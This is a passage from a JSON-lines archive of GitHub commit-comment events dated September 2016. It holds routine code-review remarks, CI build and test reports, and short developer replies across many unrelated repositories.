Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-14T23:43:09Z"}
{"id":"4565298965","type":"CommitCommentEvent","actor":{"login":"benbuckman"},"repo":{"name":"lpinca/shopify-token"},"payload":{"comment":{"id":19028590,"position":null,"line":null,"path":null,"commit_id":"748b9df7e0effac50512bb57bae95692a06d8fd3","created_at":"2016-09-14T23:43:38Z","updated_at":"2016-09-14T23:43:38Z","body":"Thanks!"}},"created_at":"2016-09-14T23:43:38Z"}
{"id":"4565301047","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"globant-ui/startup"},"payload":{"comment":{"id":19028598,"position":8,"line":8,"path":"00-HTML-CSS-basics/index.html","commit_id":"2553d9dd1f9d5ad5c03ff8ebbba07ab9716bf342","created_at":"2016-09-14T23:44:15Z","updated_at":"2016-09-14T23:44:15Z","body":"Using a `<div>` as list items wrapper is wrong, try to use `<ul>` unordered list or `<ol>` ordered list instead. Have you checked these html files with a HTML validator?"}},"created_at":"2016-09-14T23:44:15Z"}
{"id":"4565305031","type":"CommitCommentEvent","actor":{"login":"Guilleves"},"repo":{"name":"globant-ui/startup"},"payload":{"comment":{"id":19028602,"position":8,"line":8,"path":"00-HTML-CSS-basics/index.html","commit_id":"2553d9dd1f9d5ad5c03ff8ebbba07ab9716bf342","created_at":"2016-09-14T23:45:26Z","updated_at":"2016-09-14T23:45:26Z","body":"Fixed it on a later commit on the same file I think, thanks to the validator\n\nOn Wed, Sep 14, 2016 at 8:44 PM, fercho8787 <notifications@github.com>\nwrote:\n\n> Using a <div> as list items wrapper is wrong, try to use <ul> unordered\n> list or <ol> ordered list instead. Have you checked these html files with\n> a HTML validator?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/globant-ui/startup/commit/2553d9dd1f9d5ad5c03ff8ebbba07ab9716bf342#commitcomment-19028598>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AGbTg2hg3WXGT6D0uaPtN5uC3wuVLx4Vks5qqIbPgaJpZM4J9Wec>\n> .\n>\n"}},"created_at":"2016-09-14T23:45:26Z"}
{"id":"4565305317","type":"CommitCommentEvent","actor":{"login":"thopiekar"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19028603,"position":null,"line":null,"path":null,"commit_id":"31b0f748744b1bc957ab74ea5bdffa18a830935d","created_at":"2016-09-14T23:45:32Z","updated_at":"2016-09-14T23:45:32Z","body":"Seems like there is something wrong with the stats server. I only see stats from Cura 14.x going in :sweat_smile: "}},"created_at":"2016-09-14T23:45:32Z"}
{"id":"4565308210","type":"CommitCommentEvent","actor":{"login":"bbest"},"repo":{"name":"dgrimsman/boot-camp"},"payload":{"comment":{"id":19028611,"position":null,"line":null,"path":null,"commit_id":"8ae317c0c6b7293cc855afe2f4de70de44d53d6a","created_at":"2016-09-14T23:46:26Z","updated_at":"2016-09-14T23:46:26Z","body":"@dgrimsman, \r\n\r\nPerhaps you need to snap the coordinates to the nearest centroid pixel in the raster as I did at https://github.com/bbest/consmap/blob/master/server.R#L32-L37:\r\n\r\n```r\r\n    # update to nearest non-NA points on raster for shortestPath to work\r\n    xy = c(\r\n      coordinates(r)[which.min(mask(distanceFromPoints(r, xy[1]), r)),],\r\n      coordinates(r)[which.min(mask(distanceFromPoints(r, xy[2]), r)),]) %>%\r\n      matrix(ncol=2, byrow=T) %>%\r\n      SpatialPoints(crs(epsg3857))\r\n```"}},"created_at":"2016-09-14T23:46:26Z"}
{"id":"4565318682","type":"CommitCommentEvent","actor":{"login":"B3CKDOOR"},"repo":{"name":"B3CKDOOR/B3CKDOOR-BOT"},"payload":{"comment":{"id":19028635,"position":16,"line":23,"path":"B3CKDOOR-BOT/Classes/Ini file/MakeIni.cs","commit_id":"8a1a49e3adf501cb51cd672982883b51587284d8","created_at":"2016-09-14T23:49:31Z","updated_at":"2016-09-14T23:49:31Z","body":"@tei06398 please do NOT change capital sensitive things, neither things before the , in this file, that will mess up the programming"}},"created_at":"2016-09-14T23:49:31Z"}
{"id":"4565319563","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19028636,"position":null,"line":null,"path":null,"commit_id":"9129b400badd0cd3758267e75ae868f093bc807d","created_at":"2016-09-14T23:49:47Z","updated_at":"2016-09-14T23:49:47Z","body":"113836013-Swimming-Pool-Evaporation-and-Cover-Issues (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1189 of 1189 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9129b400badd0cd3758267e75ae868f093bc807d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9129b400badd0cd3758267e75ae868f093bc807d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9129b400badd0cd3758267e75ae868f093bc807d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.1%25-green.svg)</a>\n"}},"created_at":"2016-09-14T23:49:47Z"}
{"id":"4565322473","type":"CommitCommentEvent","actor":{"login":"Mistuke"},"repo":{"name":"haskell/win32"},"payload":{"comment":{"id":19028642,"position":null,"line":null,"path":null,"commit_id":"7f91a92f74b7d93081df49d01b408ae1cd9c2ff9","created_at":"2016-09-14T23:50:40Z","updated_at":"2016-09-14T23:50:40Z","body":"TeamCity Win32 Bindings for Haskell :: Win32 Continuous builds [Build 10](http://exia:8888/viewLog.html?buildId=94&buildTypeId=Win32_Win32ContinuousBuilds) is now running\n"}},"created_at":"2016-09-14T23:50:40Z"}
{"id":"4565323003","type":"CommitCommentEvent","actor":{"login":"kaganjd"},"repo":{"name":"kaganjd/p5.js-widget"},"payload":{"comment":{"id":19028645,"position":null,"line":null,"path":null,"commit_id":"f8848c9af7169eff2037f678d05493ba32237140","created_at":"2016-09-14T23:50:51Z","updated_at":"2016-09-14T23:50:51Z","body":"Woohoo for #63 adding p5.dom capability! Do you have any thoughts about UI for this? Maybe each script added as a `data-` attribute?\r\n\r\nJust for reference, when I added the p5.dom library in, set the `data-preview-width` to 400, and dropped in the example of `createCapture` from the p5 reference, this is the output I got:\r\n\r\n<img width=\"600\" alt=\"screen shot 2016-09-14 at 4 47 04 pm\" src=\"https://cloud.githubusercontent.com/assets/9204835/18533837/0a7744dc-7ab4-11e6-975b-7e79dcb1b3e3.png\">\r\n"}},"created_at":"2016-09-14T23:50:51Z"}
{"id":"4565323098","type":"CommitCommentEvent","actor":{"login":"tei06398"},"repo":{"name":"B3CKDOOR/B3CKDOOR-BOT"},"payload":{"comment":{"id":19028647,"position":16,"line":23,"path":"B3CKDOOR-BOT/Classes/Ini file/MakeIni.cs","commit_id":"8a1a49e3adf501cb51cd672982883b51587284d8","created_at":"2016-09-14T23:50:52Z","updated_at":"2016-09-14T23:50:52Z","body":"Ah\nOn Wed, Sep 14, 2016 at 7:49 PM B3CKDOOR <notifications@github.com> wrote:\n\n> @tei06398 <https://github.com/tei06398> please do NOT change capital\n> sensitive things, neither things before the , in this file, that will mess\n> up the programming\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/B3CKDOOR/B3CKDOOR-BOT/commit/8a1a49e3adf501cb51cd672982883b51587284d8#commitcomment-19028635>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/APKXgA3Vf2URBZuZ0fSKMuDWyiyaNgtyks5qqIgLgaJpZM4J9XXq>\n> .\n>\n"}},"created_at":"2016-09-14T23:50:52Z"}
{"id":"4565325090","type":"CommitCommentEvent","actor":{"login":"Dargmuesli"},"repo":{"name":"tgalal/yowsup"},"payload":{"comment":{"id":19028650,"position":20,"line":20,"path":"yowsup/common/optionalmodules.py","commit_id":"7b7739935aea5e0970f166ae98b3e3428462df8b","created_at":"2016-09-14T23:51:29Z","updated_at":"2016-09-14T23:51:29Z","body":"This line always throws an error for me eventhough ffvideo can be imported via `import ffvideo` (or `from ffvideo import VideoStream`)."}},"created_at":"2016-09-14T23:51:29Z"}
{"id":"4565326011","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"globant-ui/startup"},"payload":{"comment":{"id":19028651,"position":35,"line":35,"path":"00-HTML-CSS-basics/index.html","commit_id":"2553d9dd1f9d5ad5c03ff8ebbba07ab9716bf342","created_at":"2016-09-14T23:51:47Z","updated_at":"2016-09-14T23:51:47Z","body":"You missed the `id` attribute in order to be referenced. `id=\"fav-sport\"`"}},"created_at":"2016-09-14T23:51:47Z"}
{"id":"4565327985","type":"CommitCommentEvent","actor":{"login":"fehguy"},"repo":{"name":"swagger-api/swagger-ui"},"payload":{"comment":{"id":19028654,"position":null,"line":null,"path":null,"commit_id":"183c67a7c5f1a8bbd7a5e6571d69319d02c71ba9","created_at":"2016-09-14T23:52:22Z","updated_at":"2016-09-14T23:52:22Z","body":"yes, @bodnia I think this needs to be addressed.  Could you please?"}},"created_at":"2016-09-14T23:52:22Z"}
{"id":"4565329778","type":"CommitCommentEvent","actor":{"login":"seria1"},"repo":{"name":"Esri/developer-support"},"payload":{"comment":{"id":19028661,"position":null,"line":null,"path":null,"commit_id":"6344e6756d69eb3ccafd52e7ad8eb81192713c16","created_at":"2016-09-14T23:52:53Z","updated_at":"2016-09-14T23:52:53Z","body":"@jgravois \r\nPlease advise on how I can issue a pull request for this code sample to correct the problem. Where in the Desktop version of Github is the Pull Request command? Thanks."}},"created_at":"2016-09-14T23:52:53Z"}
{"id":"4565330554","type":"CommitCommentEvent","actor":{"login":"joseph-robertson"},"repo":{"name":"NREL/OpenStudio-BEopt"},"payload":{"comment":{"id":19028662,"position":null,"line":null,"path":null,"commit_id":"0f5f167c088886256d281c463e21fe8df5f6ea35","created_at":"2016-09-14T23:53:09Z","updated_at":"2016-09-14T23:53:09Z","body":"Oops. @shorowit how are you spotting these?"}},"created_at":"2016-09-14T23:53:09Z"}
{"id":"4565333745","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"globant-ui/startup"},"payload":{"comment":{"id":19028667,"position":48,"line":48,"path":"00-HTML-CSS-basics/index.html","commit_id":"2553d9dd1f9d5ad5c03ff8ebbba07ab9716bf342","created_at":"2016-09-14T23:54:07Z","updated_at":"2016-09-14T23:54:07Z","body":"`input` is not a valid attribute, please remove it."}},"created_at":"2016-09-14T23:54:07Z"}
{"id":"4565334513","type":"CommitCommentEvent","actor":{"login":"mmishalov"},"repo":{"name":"HPSoftware/hubot-bpm"},"payload":{"comment":{"id":19028669,"position":55,"line":55,"path":"src/lib/lwsso-utils.coffee","commit_id":"e5ef1e4e5df13bafc03915a897b6aa14913e6114","created_at":"2016-09-14T23:54:20Z","updated_at":"2016-09-14T23:54:20Z","body":"It will always take a first configuration instance however we supporting configuration of multiple BPM/ BSM instances in one bot"}},"created_at":"2016-09-14T23:54:20Z"}
{"id":"4565335811","type":"CommitCommentEvent","actor":{"login":"PeterGhimself"},"repo":{"name":"PeterGhimself/GitTutorialSept14"},"payload":{"comment":{"id":19028672,"position":null,"line":null,"path":null,"commit_id":"5a7e46dc42735734bb3cf52c250a40be50c1ef3d","created_at":"2016-09-14T23:54:43Z","updated_at":"2016-09-14T23:54:43Z","body":"absolutely lovely"}},"created_at":"2016-09-14T23:54:43Z"}
{"id":"4565339793","type":"CommitCommentEvent","actor":{"login":"mmishalov"},"repo":{"name":"HPSoftware/hubot-bpm"},"payload":{"comment":{"id":19028679,"position":25,"line":25,"path":"src/bpm-show-locations.coffee","commit_id":"e5ef1e4e5df13bafc03915a897b6aa14913e6114","created_at":"2016-09-14T23:55:54Z","updated_at":"2016-09-14T23:55:54Z","body":"Need to add support of requesting this info for specific BPM instance and not only for default one "}},"created_at":"2016-09-14T23:55:54Z"}
{"id":"4565340495","type":"CommitCommentEvent","actor":{"login":"Mistuke"},"repo":{"name":"haskell/win32"},"payload":{"comment":{"id":19028681,"position":null,"line":null,"path":null,"commit_id":"7f91a92f74b7d93081df49d01b408ae1cd9c2ff9","created_at":"2016-09-14T23:56:06Z","updated_at":"2016-09-14T23:56:06Z","body":"TeamCity Win32 Bindings for Haskell :: Win32 Continuous builds [Build 10](http://exia:8888/viewLog.html?buildId=94&buildTypeId=Win32_Win32ContinuousBuilds) outcome was **SUCCESS**\nSummary: Running Build time: 00:05:27"}},"created_at":"2016-09-14T23:56:06Z"}
{"id":"4565341226","type":"CommitCommentEvent","actor":{"login":"mmishalov"},"repo":{"name":"HPSoftware/hubot-bpm"},"payload":{"comment":{"id":19028683,"position":21,"line":28,"path":"src/bpm-show-apps.coffee","commit_id":"e5ef1e4e5df13bafc03915a897b6aa14913e6114","created_at":"2016-09-14T23:56:18Z","updated_at":"2016-09-14T23:56:18Z","body":"Need to add support of requesting this info for specific BPM instance and not only for default one "}},"created_at":"2016-09-14T23:56:18Z"}
{"id":"4565341304","type":"CommitCommentEvent","actor":{"login":"ethanport"},"repo":{"name":"mulesoft/mulesoft-docs"},"payload":{"comment":{"id":19028684,"position":null,"line":null,"path":null,"commit_id":"71d7c0b8d7ae75ea513194646607cbfdca643e5b","created_at":"2016-09-14T23:56:20Z","updated_at":"2016-09-14T23:56:20Z","body":"This fixes the wildcard function, not the wrapper function. "}},"created_at":"2016-09-14T23:56:20Z"}
{"id":"4565341658","type":"CommitCommentEvent","actor":{"login":"hugabor"},"repo":{"name":"calda/T-Squared"},"payload":{"comment":{"id":19028687,"position":53,"line":73,"path":"T-Square/Views/ClassesViewController.swift","commit_id":"823efeec188f58cc90f8e9bb6a5ff4d9c096c55a","created_at":"2016-09-14T23:56:26Z","updated_at":"2016-09-14T23:56:26Z","body":"ah, yes. mhm. yup. totally"}},"created_at":"2016-09-14T23:56:26Z"}
{"id":"4565342127","type":"CommitCommentEvent","actor":{"login":"mmishalov"},"repo":{"name":"HPSoftware/hubot-bpm"},"payload":{"comment":{"id":19028688,"position":25,"line":25,"path":"src/bpm-show-transactions.coffee","commit_id":"e5ef1e4e5df13bafc03915a897b6aa14913e6114","created_at":"2016-09-14T23:56:35Z","updated_at":"2016-09-14T23:56:35Z","body":"Need to add support of requesting this info for specific BPM instance and not only for default one "}},"created_at":"2016-09-14T23:56:35Z"}
{"id":"4565345376","type":"CommitCommentEvent","actor":{"login":"boingoing"},"repo":{"name":"nodejs/abi-stable-node"},"payload":{"comment":{"id":19028695,"position":7,"line":16,"path":"src/node_jsvmapi_types.h","commit_id":"649d595f2a8ed1e65b7ffbd3d1793cd3bc750dc6","created_at":"2016-09-14T23:57:36Z","updated_at":"2016-09-14T23:57:36Z","body":"This wrapper doesn't seem to need to be used outside of our implementation. Can it move into the cc file?"}},"created_at":"2016-09-14T23:57:36Z"}
{"id":"4565345540","type":"CommitCommentEvent","actor":{"login":"oleg-nenashev"},"repo":{"name":"jenkinsci/docker-jnlp-slave"},"payload":{"comment":{"id":19028696,"position":null,"line":null,"path":null,"commit_id":"f6910e7bc3b87774334ac598d940127e8252b79f","created_at":"2016-09-14T23:57:39Z","updated_at":"2016-09-14T23:57:39Z","body":"👎 for doing such changes without pull requests"}},"created_at":"2016-09-14T23:57:39Z"}
{"id":"4565345821","type":"CommitCommentEvent","actor":{"login":"calda"},"repo":{"name":"calda/T-Squared"},"payload":{"comment":{"id":19028699,"position":53,"line":73,"path":"T-Square/Views/ClassesViewController.swift","commit_id":"823efeec188f58cc90f8e9bb6a5ff4d9c096c55a","created_at":"2016-09-14T23:57:43Z","updated_at":"2016-09-14T23:57:43Z","body":"I'm only the maintainer now let me live"}},"created_at":"2016-09-14T23:57:43Z"}
{"id":"4565346057","type":"CommitCommentEvent","actor":{"login":"mmishalov"},"repo":{"name":"HPSoftware/hubot-bpm"},"payload":{"comment":{"id":19028700,"position":null,"line":null,"path":null,"commit_id":"e5ef1e4e5df13bafc03915a897b6aa14913e6114","created_at":"2016-09-14T23:57:47Z","updated_at":"2016-09-14T23:57:47Z","body":"It seems that it almost done.\r\nThe only one thing is missing is support of multiple BPM instances and test cases implementation. "}},"created_at":"2016-09-14T23:57:47Z"}
{"id":"4565346137","type":"CommitCommentEvent","actor":{"login":"theTwist84"},"repo":{"name":"theTwist84/Twisters-H5F-Console-Tool"},"payload":{"comment":{"id":19028702,"position":27,"line":81,"path":"Twisters-H5F-Console-Tool/Program.cs","commit_id":"e79c9c9e296628f3c5a241b685d60fc4e51624d9","created_at":"2016-09-14T23:57:48Z","updated_at":"2016-09-14T23:57:48Z","body":"Yeah, for the most part."}},"created_at":"2016-09-14T23:57:48Z"}
{"id":"4565349402","type":"CommitCommentEvent","actor":{"login":"oleg-nenashev"},"repo":{"name":"jenkinsci/docker-jnlp-slave"},"payload":{"comment":{"id":19028709,"position":null,"line":null,"path":null,"commit_id":"f6910e7bc3b87774334ac598d940127e8252b79f","created_at":"2016-09-14T23:58:48Z","updated_at":"2016-09-14T23:58:48Z","body":"CC @carlossg . IIRC he took the ownership of this repo"}},"created_at":"2016-09-14T23:58:48Z"}
{"id":"4559561217","type":"CommitCommentEvent","actor":{"login":"urbandroid"},"repo":{"name":"schionato/bean-validation-example"},"payload":{"comment":{"id":19012166,"position":null,"line":null,"path":null,"commit_id":"0ff9ddd298cea2c5d2d48944a064d077a0d02935","created_at":"2016-09-14T03:00:14Z","updated_at":"2016-09-14T03:00:14Z","body":"i did not see any bean validation"}},"created_at":"2016-09-14T03:00:14Z"}
{"id":"4559568383","type":"CommitCommentEvent","actor":{"login":"jtarchie"},"repo":{"name":"xinzweb/pullrequest-resource"},"payload":{"comment":{"id":19012191,"position":null,"line":null,"path":null,"commit_id":"2cc3f9cdcff113f34523fb446be13930860f6c38","created_at":"2016-09-14T03:02:42Z","updated_at":"2016-09-14T03:02:42Z","body":"This was fixed in the latest version of the resource."}},"created_at":"2016-09-14T03:02:42Z"}
{"id":"4559571316","type":"CommitCommentEvent","actor":{"login":"sudatta0993"},"repo":{"name":"sudatta0993/STAT_215_Project_1"},"payload":{"comment":{"id":19012193,"position":14,"line":14,"path":"equaldigit.py","commit_id":"908d9626e52a9bf1d1ec985d5feb7a3f9f2124a1","created_at":"2016-09-14T03:03:44Z","updated_at":"2016-09-14T03:03:44Z","body":"No need to implement load_data again. Just import it from summary_stat.py"}},"created_at":"2016-09-14T03:03:44Z"}
{"id":"4559571802","type":"CommitCommentEvent","actor":{"login":"TiarkRompf"},"repo":{"name":"scala-lms/tutorials"},"payload":{"comment":{"id":19012194,"position":null,"line":null,"path":null,"commit_id":"5d413de25ab4fc0919c97d7f6ced497597681263","created_at":"2016-09-14T03:03:54Z","updated_at":"2016-09-14T03:03:54Z","body":"I think the remaining errors in this file were due to abstract types, after we required that all operations take a `Typ[T]` implicit (previously we used `Manifest[T]`, which was auto-generated by the Scala compiler).\r\n\r\nlms-clean is really just an early experiment at this point, but feel free to play with the examples over there."}},"created_at":"2016-09-14T03:03:54Z"}
{"id":"4559577353","type":"CommitCommentEvent","actor":{"login":"ariel-"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19012203,"position":null,"line":null,"path":null,"commit_id":"f8be1c655b90e6334706793f6ac016448af1df0b","created_at":"2016-09-14T03:05:46Z","updated_at":"2016-09-14T03:05:46Z","body":"We already SPELL_INTERRUPT_NONPLAYER implemented; maim spell has the attribute to cast it on creatures only. This is a passive aura that would trigger whenever Maim is USED, against anything.\r\n\r\nAn aura that I don't know where it comes from, I think this is just a scrapped idea, and the spell a leftover."}},"created_at":"2016-09-14T03:05:46Z"}
{"id":"4559578742","type":"CommitCommentEvent","actor":{"login":"Iamblichos"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":19012206,"position":null,"line":null,"path":null,"commit_id":"b99e5c1f5f1c91b227b62ba1ba4384a4aea9cc36","created_at":"2016-09-14T03:06:17Z","updated_at":"2016-09-14T03:06:17Z","body":"int numDomainInfos = GC.getNumDomainInfos();; \r\n\r\nremove extra semi-colon in CvTeam.cpp"}},"created_at":"2016-09-14T03:06:17Z"}
{"id":"4559580590","type":"CommitCommentEvent","actor":{"login":"ybai69"},"repo":{"name":"ybai69/shape-restricted"},"payload":{"comment":{"id":19012210,"position":null,"line":null,"path":null,"commit_id":"c0b192064b6e5c2e52d772b04f710703563b9961","created_at":"2016-09-14T03:06:59Z","updated_at":"2016-09-14T03:06:59Z","body":"note that temp1 and temp2 can be any finite value!"}},"created_at":"2016-09-14T03:06:59Z"}
{"id":"4559584159","type":"CommitCommentEvent","actor":{"login":"huangyi1979"},"repo":{"name":"atesgoral/hrm-solutions"},"payload":{"comment":{"id":19012217,"position":37,"line":28,"path":"solutions/40-Prime-Factory-28.399/28.247-jdashton.asm","commit_id":"2fc5aeef1adea4df564f21623007e8812151674b","created_at":"2016-09-14T03:08:19Z","updated_at":"2016-09-14T03:08:19Z","body":"This logic is a hack. If the input is \"25\", this code cannot output \"5 5\", it just outputs \"25\"."}},"created_at":"2016-09-14T03:08:19Z"}
{"id":"4559586000","type":"CommitCommentEvent","actor":{"login":"wmdietl"},"repo":{"name":"typetools/checker-framework"},"payload":{"comment":{"id":19012218,"position":14,"line":66,"path":"dataflow/src/org/checkerframework/dataflow/cfg/node/ClassNameNode.java","commit_id":"80c1ea358b16ac66b4a9f85772e6f9387dcaee21","created_at":"2016-09-14T03:09:02Z","updated_at":"2016-09-14T03:09:02Z","body":"It would be nice to add `/*@Nullable*/` to field `tree` and method `getTree()`, and document when it can be null.\r\nIt might be nice to also have examples of when the different constructors are used.\r\n"}},"created_at":"2016-09-14T03:09:02Z"}
{"id":"4559586201","type":"CommitCommentEvent","actor":{"login":"s-espinosa"},"repo":{"name":"bfpepper/little-shop"},"payload":{"comment":{"id":19012219,"position":null,"line":null,"path":null,"commit_id":"fbd1d16faa1510268cd526536f811a5509c66343","created_at":"2016-09-14T03:09:07Z","updated_at":"2016-09-14T03:09:07Z","body":"@calaway Let's talk tomorrow. I'm trying to think of the use case for this. Is there anything in the user stories that would make you want to have a route like `/cart/items/1`, or `/cart/items/`? No need to answer tonight, but something to think about before we talk.\r\n\r\nAgree it was good to reach out as you think through this! 👍 "}},"created_at":"2016-09-14T03:09:07Z"}
{"id":"4559601233","type":"CommitCommentEvent","actor":{"login":"sudatta0993"},"repo":{"name":"sudatta0993/STAT_215_Project_1"},"payload":{"comment":{"id":19012237,"position":2,"line":2,"path":"test_chisq.py","commit_id":"75e54c9e6bfd87612817646d13d8bc75d092f9b5","created_at":"2016-09-14T03:15:01Z","updated_at":"2016-09-14T03:15:01Z","body":"Use unittest:\r\nRefer to https://github.com/sudatta0993/STAT_215_Project_1/blob/master/summary_stat_test.py"}},"created_at":"2016-09-14T03:15:01Z"}
{"id":"4559601628","type":"CommitCommentEvent","actor":{"login":"ignacionelson"},"repo":{"name":"ignacionelson/ProjectSend"},"payload":{"comment":{"id":19012238,"position":null,"line":null,"path":null,"commit_id":"ea85ac80fcbd380c3aa34956fce3d73ac250add0","created_at":"2016-09-14T03:15:13Z","updated_at":"2016-09-14T03:15:13Z","body":"Comes from issue #159 "}},"created_at":"2016-09-14T03:15:13Z"}
{"id":"4559604335","type":"CommitCommentEvent","actor":{"login":"sudatta0993"},"repo":{"name":"sudatta0993/STAT_215_Project_1"},"payload":{"comment":{"id":19012242,"position":16,"line":16,"path":"equaldigit.py","commit_id":"908d9626e52a9bf1d1ec985d5feb7a3f9f2124a1","created_at":"2016-09-14T03:16:14Z","updated_at":"2016-09-14T03:16:14Z","body":"Add unit test for this method.\r\nRefer to:\r\nhttps://github.com/sudatta0993/STAT_215_Project_1/blob/master/summary_stat_test.py"}},"created_at":"2016-09-14T03:16:14Z"}
{"id":"4559608106","type":"CommitCommentEvent","actor":{"login":"agustisanchez"},"repo":{"name":"agustisanchez/trivia"},"payload":{"comment":{"id":19012245,"position":null,"line":null,"path":null,"commit_id":"2225ce997502c3742bdf9b18ec2c3c3ec3cb83da","created_at":"2016-09-14T03:17:42Z","updated_at":"2016-09-14T03:17:42Z","body":"#2 Test permitir más de 6 jugadores"}},"created_at":"2016-09-14T03:17:42Z"}
{"id":"4559611343","type":"CommitCommentEvent","actor":{"login":"groeneveld91"},"repo":{"name":"agdraft/agdraft"},"payload":{"comment":{"id":19012252,"position":null,"line":null,"path":null,"commit_id":"21bdcf9ed1263debda8fbb53638b3d062be0168d","created_at":"2016-09-14T03:18:58Z","updated_at":"2016-09-14T03:18:58Z","body":"Nice i like the label design for skills"}},"created_at":"2016-09-14T03:18:58Z"}
{"id":"4559612076","type":"CommitCommentEvent","actor":{"login":"flarnie"},"repo":{"name":"facebook/draft-js"},"payload":{"comment":{"id":19012257,"position":null,"line":null,"path":null,"commit_id":"5473e5b375574f01591de98ce8c0645ee1b57dd6","created_at":"2016-09-14T03:19:15Z","updated_at":"2016-09-14T03:19:15Z","body":"This seems to be causing the lint to fail in Travis and also on my machine, with the following error:\r\n```\r\n> eslint .\r\n\r\nCannot read config file: /Users/flarnie/Code/draft-js/node_modules/eslint-config-fbjs/strict.js\r\nError: Block-scoped declarations (let, const, function, class) not yet supported outside strict mode\r\nReferenced from: /Users/flarnie/Code/draft-js/.eslintrc.js\r\nSyntaxError: Cannot read config file: /Users/flarnie/Code/draft-js/node_modules/eslint-config-fbjs/strict.js\r\nError: Block-scoped declarations (let, const, function, class) not yet supported outside strict mode\r\nReferenced from: /Users/flarnie/Code/draft-js/.eslintrc.js\r\n    at exports.runInThisContext (vm.js:53:16)\r\n    at Module._compile (module.js:413:25)\r\n    at Object.Module._extensions..js (module.js:452:10)\r\n    at Module.load (module.js:355:32)\r\n    at Function.Module._load (module.js:310:12)\r\n    at Module.require (module.js:365:17)\r\n    at require (module.js:384:17)\r\n    at module.exports (/Users/flarnie/Code/draft-js/node_modules/require-uncached/index.js:14:12)\r\n    at loadJSConfigFile (/Users/flarnie/Code/draft-js/node_modules/eslint/lib/config/config-file.js:160:16)\r\n    at loadConfigFile (/Users/flarnie/Code/draft-js/node_modules/eslint/lib/config/config-file.js:199:22)\r\n```"}},"created_at":"2016-09-14T03:19:15Z"}
{"id":"4559619553","type":"CommitCommentEvent","actor":{"login":"dcrossleyau"},"repo":{"name":"folio-org/okapi"},"payload":{"comment":{"id":19012273,"position":73,"line":73,"path":"okapi-common/src/main/java/org/folio/okapi/common/XOkapiHeaders.java","commit_id":"ba97c7630fe355b4a334fab8382aaaa9cdc9e704","created_at":"2016-09-14T03:22:10Z","updated_at":"2016-09-14T03:22:10Z","body":"Is it \"X-Okapi-Stop\" as in comments, or \"X-Okapi-Module-Stop\" as in the code below here? Probably the latter."}},"created_at":"2016-09-14T03:22:10Z"}
{"id":"4559619689","type":"CommitCommentEvent","actor":{"login":"tianheyu927"},"repo":{"name":"tianheyu927/gps"},"payload":{"comment":{"id":19012274,"position":null,"line":null,"path":null,"commit_id":"12507204ddb38eea9c95e2e957cedb9a8b86f1b2","created_at":"2016-09-14T03:22:13Z","updated_at":"2016-09-14T03:22:13Z","body":"I think we also need to remove self.params_file then."}},"created_at":"2016-09-14T03:22:13Z"}
{"id":"4559620619","type":"CommitCommentEvent","actor":{"login":"suwangcompling"},"repo":{"name":"suwangcompling/bayesianmodels"},"payload":{"comment":{"id":19012275,"position":null,"line":null,"path":null,"commit_id":"9f2cd5b4a61a2cf6812c3a496e6a5ca8acf3d14c","created_at":"2016-09-14T03:22:33Z","updated_at":"2016-09-14T03:22:33Z","body":"Updating model description for model 4 and 5."}},"created_at":"2016-09-14T03:22:33Z"}
{"id":"4559626815","type":"CommitCommentEvent","actor":{"login":"RichardMarks"},"repo":{"name":"stephenc222/Punch-the-Monkey"},"payload":{"comment":{"id":19012292,"position":2,"line":2,"path":"package.json","commit_id":"5868161b2279b105f08e9c4fe576b4ac6ef2c339","created_at":"2016-09-14T03:25:01Z","updated_at":"2016-09-14T03:25:01Z","body":"should change the name to something useful"}},"created_at":"2016-09-14T03:25:01Z"}
{"id":"4559627519","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19012296,"position":null,"line":null,"path":null,"commit_id":"18ba828728c0fdea5ff74379f2ca91fef5172cb0","created_at":"2016-09-14T03:25:17Z","updated_at":"2016-09-14T03:25:17Z","body":"input_processor_refactor (mbadams5) - x86_64-MacOS-10.9-clang: Tests Failed (1787 of 2351 tests passed, 19 test warnings)\n\n * 260 tests had: AUD diffs.\n * 243 tests had: EIO diffs.\n * 234 tests had: Table big diffs.\n * 46 tests had: RDD diffs.\n * 50 tests had: ERR diffs.\n * 166 tests had: MTD diffs.\n * 114 tests had: DXF diffs.\n * 1 test had: S...\n * 183 tests had: SHD diffs.\n * 150 tests had: MDD diffs.\n * 179 tests had: BND diffs.\n * 3 tests had: delightin diffs.\n * 3 tests had: delightout diffs.\n * 6 tests had: ESO small diffs.\n * 8 tests had: MTR big diffs.\n * 10 tests had: ESO big diffs.\n * 1 test had: M...\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-18ba828728c0fdea5ff74379f2ca91fef5172cb0-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a 